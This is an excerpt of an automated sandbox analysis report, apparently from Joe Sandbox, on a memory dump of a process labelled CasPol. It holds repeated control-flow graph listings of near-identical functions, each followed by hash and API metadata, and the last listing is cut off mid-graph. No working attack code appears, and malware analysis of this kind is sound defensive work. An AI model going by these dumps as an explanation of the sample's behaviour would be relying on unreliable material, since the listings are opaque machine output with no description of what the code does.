                                                                                    control_flow_graph 9333 10072d8-10072fc call 1006288 call 1006418 9692 10072fc call 15697d8 9333->9692 9693 10072fc call 1569838 9333->9693 9339 1007302-1007407 9650 1007407 call 156aa58 9339->9650 9651 1007407 call 156a9f9 9339->9651 9351 100740d-1007462 9660 1007462 call 156ac37 9351->9660 9661 1007462 call 156ad47 9351->9661 9662 1007462 call 156ace8 9351->9662 9355 1007468-1007528 9672 1007528 call 156b6a5 9355->9672 9673 1007528 call 156b140 9355->9673 9674 1007528 call 156b0e0 9355->9674 9675 1007528 call 156b651 9355->9675 9676 1007528 call 156b358 9355->9676 9364 100752e-1007564 9678 1007564 call 1c7710f7 9364->9678 9679 1007564 call 1c7715b3 9364->9679 9680 1007564 call 1c771bcf 9364->9680 9681 1007564 call 1c771108 9364->9681 9367 100756a-10075e5 9685 10075e5 call 1c771e27 9367->9685 9686 10075e5 call 1c771d68 9367->9686 9687 10075e5 call 1c771dc8 9367->9687 9373 10075eb-100762a 9694 100762a call 1c771f47 9373->9694 9695 100762a call 1c771e8a 9373->9695 9696 100762a call 1c771ee8 9373->9696 9376 1007630-10076ba 9702 10076ba call 1c772450 9376->9702 9703 10076ba call 1c7723b0 9376->9703 9704 10076ba call 1c7724af 9376->9704 9382 10076c0-1007702 9708 1007702 call 1c772570 9382->9708 9709 1007702 call 1c772510 9382->9709 9385 1007708-1007781 9655 1007787 call 1c7734c1 9385->9655 9656 1007787 call 1c773660 9385->9656 9657 1007787 call 1c7734bf 9385->9657 9658 1007787 call 1c7736dd 9385->9658 9659 1007787 call 1c773568 9385->9659 9392 100778d-10078db call 1c7737a8 * 5 LdrInitializeThunk 9413 10078e1-1007905 9392->9413 9414 1007c02 9392->9414 9420 100790b 9413->9420 9421 1007a5e-1007a82 9413->9421 9705 1007c02 call 1c773cc9 9414->9705 9706 1007c02 call 1c773cd8 9414->9706 9707 1007c02 call 1c773dc8 9414->9707 9415 1007c08-1007c92 9663 1007c92 call 1c7745e0 9415->9663 9664 1007c92 call 1c774580 9415->9664 9420->9421 9422 1007911-1007a59 9420->9422 9428 1007a84 9421->9428 9429 1007a88-1007a8a 9421->9429 9422->9414 9432 1007a86 9428->9432 9433 1007a8c 9428->9433 9434 1007a91-1007abb 9429->9434 9432->9429 9433->9434 9443 1007ac1-1007ac3 9434->9443 9444 1007abd 9434->9444 9436 1007c98-1007cda 9682 1007cda call 1c7749fa 9436->9682 9683 1007cda call 1c774a08 9436->9683 9447 1007aca-1007ad0 9443->9447 9445 1007ac5 9444->9445 9446 1007abf 9444->9446 9445->9447 9446->9443 9447->9414 9449 1007ad6-1007bd9 9447->9449 9448 1007ce0-1007d22 9697 1007d22 call 1c774f27 9448->9697 9698 1007d22 call 1c7749fa 9448->9698 9699 1007d22 call 1c774e28 9448->9699 9700 1007d22 call 1c774a08 9448->9700 9449->9414 9455 1007d28-1007d6a 9652 1007d6a call 1c775047 9455->9652 9653 1007d6a call 1c774fe8 9455->9653 9654 1007d6a call 1c774f88 9455->9654 9464 1007d70-1007db2 9666 1007db2 call 1c7750a8 9464->9666 9667 1007db2 call 1c775108 9464->9667 9472 1007db8-1007e8a 9712 1007e8a call 1c776507 9472->9712 9713 1007e8a call 1c776096 9472->9713 9714 1007e8a call 1c7760a0 9472->9714 9715 1007e8a call 1c7763a9 9472->9715 9716 1007e8a call 1c7761e8 9472->9716 9496 1007e90-1007f1a 9668 1007f1a call 1c7768a0 9496->9668 9669 1007f1a call 1c776890 9496->9669 9511 1007f20-1007fe6 9688 1007fe6 call 1c778c47 9511->9688 9689 1007fe6 call 1c778ce7 9511->9689 9690 1007fe6 call 1c778c50 9511->9690 9520 1007fec-1008038 9523 1008331-1008342 9520->9523 9524 100803e-1008061 9520->9524 9527 1008348-100834f 9523->9527 9528 100869c-10086a3 9523->9528 9536 1008067-10080d9 9524->9536 9537 1008319-100832e 9524->9537 9531 1008355-1008363 9527->9531 9532 10083e6-10083ed 9527->9532 9529 1008725-1008740 9528->9529 9530 10086a9-100871a 9528->9530 9530->9529 9670 1008369 call 1c77a6f0 9531->9670 9671 1008369 call 1c77a700 9531->9671 9534 10083f3-1008538 call 1005aa8 call 10056b0 9532->9534 9535 100855d-1008564 9532->9535 9534->9528 9535->9528 9538 100856a-100867f call 1005aa8 call 10056b0 call 10056f8 9535->9538 9563 1008301-1008313 9536->9563 9564 10080df-10080e6 9536->9564 9545 100832f 9537->9545 9538->9528 9545->9545 9553 100836f-10083a9 9710 10083af call 1c77b9c0 9553->9710 9711 10083af call 1c77b91f 9553->9711 9563->9536 9563->9537 9568 10080ec-10081fa 9564->9568 9569 10081ff-100822a 9564->9569 9568->9563 9569->9563 9574 1008230-10082d8 9569->9574 9573 10083b5 9573->9528 9574->9563 9650->9351 9651->9351 9652->9464 9653->9464 9654->9464 9655->9392 9656->9392 9657->9392 9658->9392 9659->9392 9660->9355 9661->9355 9662->9355 9663->9436 9664->9436 9666->9472 9667->9472 9668->9511 9669->9511 9670->9553 9671->9553 9672->9364 9673->9364 9674->9364 9675->9364 9676->9364 9678->9367 9679->9367 9680->9367 9681->9367 9682->9448 9683->9448 9685->9373 9686->9373 9687->9373 9688->9520 9689->9520 9690->9520 9692->9339 9693->9339 9694->9376 9695->9376 9696->9376 9697->9455 9698->9455 9699->9455 9700->9455 9702->9382 9703->9382 9704->9382 9705->9415 9706->9415 9707->9415 9708->9385 9709->9385 9710->9573 9711->9573 9712->9496 9713->9496 9714->9496 9715->9496 9716->9496
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 0d95a7b0a3cee65fa5b70077bfe3ff574a581f4bce7c6ef91aaf777ad8f39520
                                                                                    • Instruction ID: c62bb7a669a82f978cf2b6a9ba2a75c301625ec1b3ff1168efda4a4794e8db62
                                                                                    • Opcode Fuzzy Hash: 0d95a7b0a3cee65fa5b70077bfe3ff574a581f4bce7c6ef91aaf777ad8f39520
                                                                                    • Instruction Fuzzy Hash: 84422874A04228CFCB65EF70C888B9DB7B6BF88205F5081EAD54AA3744DB359E85CF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0100731D Relevance: 2.0, APIs: 1, Instructions: 521libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 9717 100731d-1007407 call 1006288 call 1006418 10086 1007407 call 156aa58 9717->10086 10087 1007407 call 156a9f9 9717->10087 9732 100740d-1007462 10093 1007462 call 156ac37 9732->10093 10094 1007462 call 156ad47 9732->10094 10095 1007462 call 156ace8 9732->10095 9736 1007468-1007528 10036 1007528 call 156b6a5 9736->10036 10037 1007528 call 156b140 9736->10037 10038 1007528 call 156b0e0 9736->10038 10039 1007528 call 156b651 9736->10039 10040 1007528 call 156b358 9736->10040 9745 100752e-1007564 10042 1007564 call 1c7710f7 9745->10042 10043 1007564 call 1c7715b3 9745->10043 10044 1007564 call 1c771bcf 9745->10044 10045 1007564 call 1c771108 9745->10045 9748 100756a-10075e5 10054 10075e5 call 1c771e27 9748->10054 10055 10075e5 call 1c771d68 9748->10055 10056 10075e5 call 1c771dc8 9748->10056 9754 10075eb-100762a 10057 100762a call 1c771f47 9754->10057 10058 100762a call 1c771e8a 9754->10058 10059 100762a call 1c771ee8 9754->10059 9757 1007630-10076ba 10073 10076ba call 1c772450 9757->10073 10074 10076ba call 1c7723b0 9757->10074 10075 10076ba call 1c7724af 9757->10075 9763 10076c0-1007702 10076 1007702 call 1c772570 9763->10076 10077 1007702 call 1c772510 9763->10077 9766 1007708-1007781 10088 1007787 call 1c7734c1 9766->10088 10089 1007787 call 1c773660 9766->10089 10090 1007787 call 1c7734bf 9766->10090 10091 1007787 call 1c7736dd 9766->10091 10092 1007787 call 1c773568 9766->10092 9773 100778d-10078db call 1c7737a8 * 5 LdrInitializeThunk 9794 10078e1-1007905 9773->9794 9795 1007c02 9773->9795 9801 100790b 9794->9801 9802 1007a5e-1007a82 9794->9802 10064 1007c02 call 1c773cc9 9795->10064 10065 1007c02 call 1c773cd8 9795->10065 10066 1007c02 call 1c773dc8 9795->10066 9796 1007c08-1007c92 10034 1007c92 call 1c7745e0 9796->10034 10035 1007c92 call 1c774580 9796->10035 9801->9802 9803 1007911-1007a59 9801->9803 9809 1007a84 9802->9809 9810 1007a88-1007a8a 9802->9810 9803->9795 9813 1007a86 9809->9813 9814 1007a8c 9809->9814 9815 1007a91-1007abb 9810->9815 9813->9810 9814->9815 9824 1007ac1-1007ac3 9815->9824 9825 1007abd 9815->9825 9817 1007c98-1007cda 10051 1007cda call 1c7749fa 9817->10051 10052 1007cda call 1c774a08 9817->10052 9828 1007aca-1007ad0 9824->9828 9826 1007ac5 9825->9826 9827 1007abf 9825->9827 9826->9828 9827->9824 9828->9795 9830 1007ad6-1007bd9 9828->9830 9829 1007ce0-1007d22 10067 1007d22 call 1c774f27 9829->10067 10068 1007d22 call 1c7749fa 9829->10068 10069 1007d22 call 1c774e28 9829->10069 10070 1007d22 call 1c774a08 9829->10070 9830->9795 9836 1007d28-1007d6a 10078 1007d6a call 1c775047 9836->10078 10079 1007d6a call 1c774fe8 9836->10079 10080 1007d6a call 1c774f88 9836->10080 9845 1007d70-1007db2 10032 1007db2 call 1c7750a8 9845->10032 10033 1007db2 call 1c775108 9845->10033 9853 1007db8-1007e8a 10081 1007e8a call 1c776507 9853->10081 10082 1007e8a call 1c776096 9853->10082 10083 1007e8a call 1c7760a0 9853->10083 10084 1007e8a call 1c7763a9 9853->10084 10085 1007e8a call 1c7761e8 9853->10085 9877 1007e90-1007f1a 10046 1007f1a call 1c7768a0 9877->10046 10047 1007f1a call 1c776890 9877->10047 9892 1007f20-1007fe6 10060 1007fe6 call 1c778c47 9892->10060 10061 1007fe6 call 1c778ce7 9892->10061 10062 1007fe6 call 1c778c50 9892->10062 9901 1007fec-1008038 9904 1008331-1008342 9901->9904 9905 100803e-1008061 9901->9905 9908 1008348-100834f 9904->9908 9909 100869c-10086a3 9904->9909 9917 1008067-10080d9 9905->9917 9918 1008319-100832e 9905->9918 9912 1008355-1008363 9908->9912 9913 10083e6-10083ed 9908->9913 9910 1008725-1008740 9909->9910 9911 10086a9-100871a 9909->9911 9911->9910 10048 1008369 call 1c77a6f0 9912->10048 10049 1008369 call 1c77a700 9912->10049 9915 10083f3-1008538 call 1005aa8 call 10056b0 9913->9915 9916 100855d-1008564 9913->9916 9915->9909 9916->9909 9919 100856a-100867f call 1005aa8 call 10056b0 call 10056f8 9916->9919 9944 1008301-1008313 9917->9944 9945 10080df-10080e6 9917->9945 9926 100832f 9918->9926 9919->9909 9926->9926 9934 100836f-10083a9 10071 10083af call 1c77b9c0 9934->10071 10072 10083af call 1c77b91f 9934->10072 9944->9917 9944->9918 9949 10080ec-10081fa 9945->9949 9950 10081ff-100822a 9945->9950 9949->9944 9950->9944 9955 1008230-10082d8 9950->9955 9954 10083b5 9954->9909 9955->9944 10032->9853 10033->9853 10034->9817 10035->9817 10036->9745 10037->9745 10038->9745 10039->9745 10040->9745 10042->9748 10043->9748 10044->9748 10045->9748 10046->9892 10047->9892 10048->9934 10049->9934 10051->9829 10052->9829 10054->9754 10055->9754 10056->9754 10057->9757 10058->9757 10059->9757 10060->9901 10061->9901 10062->9901 10064->9796 10065->9796 10066->9796 10067->9836 10068->9836 10069->9836 10070->9836 10071->9954 10072->9954 10073->9763 10074->9763 10075->9763 10076->9766 10077->9766 10078->9845 10079->9845 10080->9845 10081->9877 10082->9877 10083->9877 10084->9877 10085->9877 10086->9732 10087->9732 10088->9773 10089->9773 10090->9773 10091->9773 10092->9773 10093->9736 10094->9736 10095->9736
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 93a77005c30a4a1ba191f2939dc9c41190ce3d6846561136c315fc477f89d1eb
                                                                                    • Instruction ID: 96b3c80b0e2ddc566d31035df1664258b1de9491f368e9488e5379484d7c02c3
                                                                                    • Opcode Fuzzy Hash: 93a77005c30a4a1ba191f2939dc9c41190ce3d6846561136c315fc477f89d1eb
                                                                                    • Instruction Fuzzy Hash: 15322774A04228CFCB65EF70C888B9DB7B6BF88205F5081EAD54AA3744DB359E85CF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01007362 Relevance: 2.0, APIs: 1, Instructions: 514libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 10096 1007362-1007407 call 1006288 call 1006418 10470 1007407 call 156aa58 10096->10470 10471 1007407 call 156a9f9 10096->10471 10108 100740d-1007462 10412 1007462 call 156ac37 10108->10412 10413 1007462 call 156ad47 10108->10413 10414 1007462 call 156ace8 10108->10414 10112 1007468-1007528 10420 1007528 call 156b6a5 10112->10420 10421 1007528 call 156b140 10112->10421 10422 1007528 call 156b0e0 10112->10422 10423 1007528 call 156b651 10112->10423 10424 1007528 call 156b358 10112->10424 10121 100752e-1007564 10426 1007564 call 1c7710f7 10121->10426 10427 1007564 call 1c7715b3 10121->10427 10428 1007564 call 1c771bcf 10121->10428 10429 1007564 call 1c771108 10121->10429 10124 100756a-10075e5 10438 10075e5 call 1c771e27 10124->10438 10439 10075e5 call 1c771d68 10124->10439 10440 10075e5 call 1c771dc8 10124->10440 10130 10075eb-100762a 10441 100762a call 1c771f47 10130->10441 10442 100762a call 1c771e8a 10130->10442 10443 100762a call 1c771ee8 10130->10443 10133 1007630-10076ba 10457 10076ba call 1c772450 10133->10457 10458 10076ba call 1c7723b0 10133->10458 10459 10076ba call 1c7724af 10133->10459 10139 10076c0-1007702 10460 1007702 call 1c772570 10139->10460 10461 1007702 call 1c772510 10139->10461 10142 1007708-1007781 10407 1007787 call 1c7734c1 10142->10407 10408 1007787 call 1c773660 10142->10408 10409 1007787 call 1c7734bf 10142->10409 10410 1007787 call 1c7736dd 10142->10410 10411 1007787 call 1c773568 10142->10411 10149 100778d-10078db call 1c7737a8 * 5 LdrInitializeThunk 10170 10078e1-1007905 10149->10170 10171 1007c02 10149->10171 10177 100790b 10170->10177 10178 1007a5e-1007a82 10170->10178 10448 1007c02 call 1c773cc9 10171->10448 10449 1007c02 call 1c773cd8 10171->10449 10450 1007c02 call 1c773dc8 10171->10450 10172 1007c08-1007c92 10418 1007c92 call 1c7745e0 10172->10418 10419 1007c92 call 1c774580 10172->10419 10177->10178 10179 1007911-1007a59 10177->10179 10185 1007a84 10178->10185 10186 1007a88-1007a8a 10178->10186 10179->10171 10189 1007a86 10185->10189 10190 1007a8c 10185->10190 10191 1007a91-1007abb 10186->10191 10189->10186 10190->10191 10200 1007ac1-1007ac3 10191->10200 10201 1007abd 10191->10201 10193 1007c98-1007cda 10435 1007cda call 1c7749fa 10193->10435 10436 1007cda call 1c774a08 10193->10436 10204 1007aca-1007ad0 10200->10204 10202 1007ac5 10201->10202 10203 1007abf 10201->10203 10202->10204 10203->10200 10204->10171 10206 1007ad6-1007bd9 10204->10206 10205 1007ce0-1007d22 10451 1007d22 call 1c774f27 10205->10451 10452 1007d22 call 1c7749fa 10205->10452 10453 1007d22 call 1c774e28 10205->10453 10454 1007d22 call 1c774a08 10205->10454 10206->10171 10212 1007d28-1007d6a 10462 1007d6a call 1c775047 10212->10462 10463 1007d6a call 1c774fe8 10212->10463 10464 1007d6a call 1c774f88 10212->10464 10221 1007d70-1007db2 10416 1007db2 call 1c7750a8 10221->10416 10417 1007db2 call 1c775108 10221->10417 10229 1007db8-1007e8a 10465 1007e8a call 1c776507 10229->10465 10466 1007e8a call 1c776096 10229->10466 10467 1007e8a call 1c7760a0 10229->10467 10468 1007e8a call 1c7763a9 10229->10468 10469 1007e8a call 1c7761e8 10229->10469 10253 1007e90-1007f1a 10430 1007f1a call 1c7768a0 10253->10430 10431 1007f1a call 1c776890 10253->10431 10268 1007f20-1007fe6 10444 1007fe6 call 1c778c47 10268->10444 10445 1007fe6 call 1c778ce7 10268->10445 10446 1007fe6 call 1c778c50 10268->10446 10277 1007fec-1008038 10280 1008331-1008342 10277->10280 10281 100803e-1008061 10277->10281 10284 1008348-100834f 10280->10284 10285 100869c-10086a3 10280->10285 10293 1008067-10080d9 10281->10293 10294 1008319-100832e 10281->10294 10288 1008355-1008363 10284->10288 10289 10083e6-10083ed 10284->10289 10286 1008725-1008740 10285->10286 10287 10086a9-100871a 10285->10287 10287->10286 10432 1008369 call 1c77a6f0 10288->10432 10433 1008369 call 1c77a700 10288->10433 10291 10083f3-1008538 call 1005aa8 call 10056b0 10289->10291 10292 100855d-1008564 10289->10292 10291->10285 10292->10285 10295 100856a-100867f call 1005aa8 call 10056b0 call 10056f8 10292->10295 10320 1008301-1008313 10293->10320 10321 10080df-10080e6 10293->10321 10302 100832f 10294->10302 10295->10285 10302->10302 10310 100836f-10083a9 10455 10083af call 1c77b9c0 10310->10455 10456 10083af call 1c77b91f 10310->10456 10320->10293 10320->10294 10325 10080ec-10081fa 10321->10325 10326 10081ff-100822a 10321->10326 10325->10320 10326->10320 10331 1008230-10082d8 10326->10331 10330 10083b5 10330->10285 10331->10320 10407->10149 10408->10149 10409->10149 10410->10149 10411->10149 10412->10112 10413->10112 10414->10112 10416->10229 10417->10229 10418->10193 10419->10193 10420->10121 10421->10121 10422->10121 10423->10121 10424->10121 10426->10124 10427->10124 10428->10124 10429->10124 10430->10268 10431->10268 10432->10310 10433->10310 10435->10205 10436->10205 10438->10130 10439->10130 10440->10130 10441->10133 10442->10133 10443->10133 10444->10277 10445->10277 10446->10277 10448->10172 10449->10172 10450->10172 10451->10212 10452->10212 10453->10212 10454->10212 10455->10330 10456->10330 10457->10139 10458->10139 10459->10139 10460->10142 10461->10142 10462->10221 10463->10221 10464->10221 10465->10253 10466->10253 10467->10253 10468->10253 10469->10253 10470->10108 10471->10108
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 7db96d1ed49978e5a444e86cb6a5cb964b35cb9a16a3f468b2e3248b99f0c31b
                                                                                    • Instruction ID: dfcc83c643b776c79e32f791ab23d08023555151bf94df704d1e91cb1848fd58
                                                                                    • Opcode Fuzzy Hash: 7db96d1ed49978e5a444e86cb6a5cb964b35cb9a16a3f468b2e3248b99f0c31b
                                                                                    • Instruction Fuzzy Hash: 47322874A04228CFCB65DF70C888B9DB7B6BF88205F6081EAD54AA3744DB359E85CF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 010073A7 Relevance: 2.0, APIs: 1, Instructions: 505libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 10472 10073a7-1007407 call 1006288 call 1006418 10840 1007407 call 156aa58 10472->10840 10841 1007407 call 156a9f9 10472->10841 10481 100740d-1007462 10785 1007462 call 156ac37 10481->10785 10786 1007462 call 156ad47 10481->10786 10787 1007462 call 156ace8 10481->10787 10485 1007468-1007528 10797 1007528 call 156b6a5 10485->10797 10798 1007528 call 156b140 10485->10798 10799 1007528 call 156b0e0 10485->10799 10800 1007528 call 156b651 10485->10800 10801 1007528 call 156b358 10485->10801 10494 100752e-1007564 10803 1007564 call 1c7710f7 10494->10803 10804 1007564 call 1c7715b3 10494->10804 10805 1007564 call 1c771bcf 10494->10805 10806 1007564 call 1c771108 10494->10806 10497 100756a-10075e5 10810 10075e5 call 1c771e27 10497->10810 10811 10075e5 call 1c771d68 10497->10811 10812 10075e5 call 1c771dc8 10497->10812 10503 10075eb-100762a 10817 100762a call 1c771f47 10503->10817 10818 100762a call 1c771e8a 10503->10818 10819 100762a call 1c771ee8 10503->10819 10506 1007630-10076ba 10825 10076ba call 1c772450 10506->10825 10826 10076ba call 1c7723b0 10506->10826 10827 10076ba call 1c7724af 10506->10827 10512 10076c0-1007702 10831 1007702 call 1c772570 10512->10831 10832 1007702 call 1c772510 10512->10832 10515 1007708-1007781 10780 1007787 call 1c7734c1 10515->10780 10781 1007787 call 1c773660 10515->10781 10782 1007787 call 1c7734bf 10515->10782 10783 1007787 call 1c7736dd 10515->10783 10784 1007787 call 1c773568 10515->10784 10522 100778d-10078db call 1c7737a8 * 5 LdrInitializeThunk 10543 10078e1-1007905 10522->10543 10544 1007c02 10522->10544 10550 100790b 10543->10550 10551 1007a5e-1007a82 10543->10551 10828 1007c02 call 1c773cc9 10544->10828 10829 1007c02 call 1c773cd8 10544->10829 10830 1007c02 call 1c773dc8 10544->10830 10545 1007c08-1007c92 10788 1007c92 call 1c7745e0 10545->10788 10789 1007c92 call 1c774580 10545->10789 10550->10551 10552 1007911-1007a59 10550->10552 10558 1007a84 10551->10558 10559 1007a88-1007a8a 10551->10559 10552->10544 10562 1007a86 10558->10562 10563 1007a8c 10558->10563 10564 1007a91-1007abb 10559->10564 10562->10559 10563->10564 10573 1007ac1-1007ac3 10564->10573 10574 1007abd 10564->10574 10566 1007c98-1007cda 10807 1007cda call 1c7749fa 10566->10807 10808 1007cda call 1c774a08 10566->10808 10577 1007aca-1007ad0 10573->10577 10575 1007ac5 10574->10575 10576 1007abf 10574->10576 10575->10577 10576->10573 10577->10544 10579 1007ad6-1007bd9 10577->10579 10578 1007ce0-1007d22 10820 1007d22 call 1c774f27 10578->10820 10821 1007d22 call 1c7749fa 10578->10821 10822 1007d22 call 1c774e28 10578->10822 10823 1007d22 call 1c774a08 10578->10823 10579->10544 10585 1007d28-1007d6a 10842 1007d6a call 1c775047 10585->10842 10843 1007d6a call 1c774fe8 10585->10843 10844 1007d6a call 1c774f88 10585->10844 10594 1007d70-1007db2 10791 1007db2 call 1c7750a8 10594->10791 10792 1007db2 call 1c775108 10594->10792 10602 1007db8-1007e8a 10835 1007e8a call 1c776507 10602->10835 10836 1007e8a call 1c776096 10602->10836 10837 1007e8a call 1c7760a0 10602->10837 10838 1007e8a call 1c7763a9 10602->10838 10839 1007e8a call 1c7761e8 10602->10839 10626 1007e90-1007f1a 10793 1007f1a call 1c7768a0 10626->10793 10794 1007f1a call 1c776890 10626->10794 10641 1007f20-1007fe6 10813 1007fe6 call 1c778c47 10641->10813 10814 1007fe6 call 1c778ce7 10641->10814 10815 1007fe6 call 1c778c50 10641->10815 10650 1007fec-1008038 10653 1008331-1008342 10650->10653 10654 100803e-1008061 10650->10654 10657 1008348-100834f 10653->10657 10658 100869c-10086a3 10653->10658 10666 1008067-10080d9 10654->10666 10667 1008319-100832e 10654->10667 10661 1008355-1008363 10657->10661 10662 10083e6-10083ed 10657->10662 10659 1008725-1008740 10658->10659 10660 10086a9-100871a 10658->10660 10660->10659 10795 1008369 call 1c77a6f0 10661->10795 10796 1008369 call 1c77a700 10661->10796 10664 10083f3-1008538 call 1005aa8 call 10056b0 10662->10664 10665 100855d-1008564 10662->10665 10664->10658 10665->10658 10668 100856a-100867f call 1005aa8 call 10056b0 call 10056f8 10665->10668 10693 1008301-1008313 10666->10693 10694 10080df-10080e6 10666->10694 10675 100832f 10667->10675 10668->10658 10675->10675 10683 100836f-10083a9 10833 10083af call 1c77b9c0 10683->10833 10834 10083af call 1c77b91f 10683->10834 10693->10666 10693->10667 10698 10080ec-10081fa 10694->10698 10699 10081ff-100822a 10694->10699 10698->10693 10699->10693 10704 1008230-10082d8 10699->10704 10703 10083b5 10703->10658 10704->10693 10780->10522 10781->10522 10782->10522 10783->10522 10784->10522 10785->10485 10786->10485 10787->10485 10788->10566 10789->10566 10791->10602 10792->10602 10793->10641 10794->10641 10795->10683 10796->10683 10797->10494 10798->10494 10799->10494 10800->10494 10801->10494 10803->10497 10804->10497 10805->10497 10806->10497 10807->10578 10808->10578 10810->10503 10811->10503 10812->10503 10813->10650 10814->10650 10815->10650 10817->10506 10818->10506 10819->10506 10820->10585 10821->10585 10822->10585 10823->10585 10825->10512 10826->10512 10827->10512 10828->10545 10829->10545 10830->10545 10831->10515 10832->10515 10833->10703 10834->10703 10835->10626 10836->10626 10837->10626 10838->10626 10839->10626 10840->10481 10841->10481 10842->10594 10843->10594 10844->10594
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: af527fabde4fad023565fd5717200eb9312cb2ed0b94ac44f646f6ec84257e17
                                                                                    • Instruction ID: 34d66c5c330a35b576015b25f5ad018303dd1a498ac1b0348b67aeeaf13d1842
                                                                                    • Opcode Fuzzy Hash: af527fabde4fad023565fd5717200eb9312cb2ed0b94ac44f646f6ec84257e17
                                                                                    • Instruction Fuzzy Hash: 2F323874A04228CFCB65EF70C888B9DB7B6BF88205F5081EAD54AA3744DB359E85CF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 010073E3 Relevance: 2.0, APIs: 1, Instructions: 500libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 10845 10073e3-1007407 call 1006288 call 1006418 11185 1007407 call 156aa58 10845->11185 11186 1007407 call 156a9f9 10845->11186 10851 100740d-1007462 11192 1007462 call 156ac37 10851->11192 11193 1007462 call 156ad47 10851->11193 11194 1007462 call 156ace8 10851->11194 10855 1007468-1007528 11200 1007528 call 156b6a5 10855->11200 11201 1007528 call 156b140 10855->11201 11202 1007528 call 156b0e0 10855->11202 11203 1007528 call 156b651 10855->11203 11204 1007528 call 156b358 10855->11204 10864 100752e-1007564 11211 1007564 call 1c7710f7 10864->11211 11212 1007564 call 1c7715b3 10864->11212 11213 1007564 call 1c771bcf 10864->11213 11214 1007564 call 1c771108 10864->11214 10867 100756a-10075e5 11152 10075e5 call 1c771e27 10867->11152 11153 10075e5 call 1c771d68 10867->11153 11154 10075e5 call 1c771dc8 10867->11154 10873 10075eb-100762a 11156 100762a call 1c771f47 10873->11156 11157 100762a call 1c771e8a 10873->11157 11158 100762a call 1c771ee8 10873->11158 10876 1007630-10076ba 11172 10076ba call 1c772450 10876->11172 11173 10076ba call 1c7723b0 10876->11173 11174 10076ba call 1c7724af 10876->11174 10882 10076c0-1007702 11175 1007702 call 1c772570 10882->11175 11176 1007702 call 1c772510 10882->11176 10885 1007708-1007781 11187 1007787 call 1c7734c1 10885->11187 11188 1007787 call 1c773660 10885->11188 11189 1007787 call 1c7734bf 10885->11189 11190 1007787 call 1c7736dd 10885->11190 11191 1007787 call 1c773568 10885->11191 10892 100778d-10078db call 1c7737a8 * 5 LdrInitializeThunk 10913 10078e1-1007905 10892->10913 10914 1007c02 10892->10914 10920 100790b 10913->10920 10921 1007a5e-1007a82 10913->10921 11169 1007c02 call 1c773cc9 10914->11169 11170 1007c02 call 1c773cd8 10914->11170 11171 1007c02 call 1c773dc8 10914->11171 10915 1007c08-1007c92 11196 1007c92 call 1c7745e0 10915->11196 11197 1007c92 call 1c774580 10915->11197 10920->10921 10922 1007911-1007a59 10920->10922 10928 1007a84 10921->10928 10929 1007a88-1007a8a 10921->10929 10922->10914 10932 1007a86 10928->10932 10933 1007a8c 10928->10933 10934 1007a91-1007abb 10929->10934 10932->10929 10933->10934 10943 1007ac1-1007ac3 10934->10943 10944 1007abd 10934->10944 10936 1007c98-1007cda 11150 1007cda call 1c7749fa 10936->11150 11151 1007cda call 1c774a08 10936->11151 10947 1007aca-1007ad0 10943->10947 10945 1007ac5 10944->10945 10946 1007abf 10944->10946 10945->10947 10946->10943 10947->10914 10949 1007ad6-1007bd9 10947->10949 10948 1007ce0-1007d22 11163 1007d22 call 1c774f27 10948->11163 11164 1007d22 call 1c7749fa 10948->11164 11165 1007d22 call 1c774e28 10948->11165 11166 1007d22 call 1c774a08 10948->11166 10949->10914 10955 1007d28-1007d6a 11182 1007d6a call 1c775047 10955->11182 11183 1007d6a call 1c774fe8 10955->11183 11184 1007d6a call 1c774f88 10955->11184 10964 1007d70-1007db2 11198 1007db2 call 1c7750a8 10964->11198 11199 1007db2 call 1c775108 10964->11199 10972 1007db8-1007e8a 11177 1007e8a call 1c776507 10972->11177 11178 1007e8a call 1c776096 10972->11178 11179 1007e8a call 1c7760a0 10972->11179 11180 1007e8a call 1c7763a9 10972->11180 11181 1007e8a call 1c7761e8 10972->11181 10996 1007e90-1007f1a 11208 1007f1a call 1c7768a0 10996->11208 11209 1007f1a call 1c776890 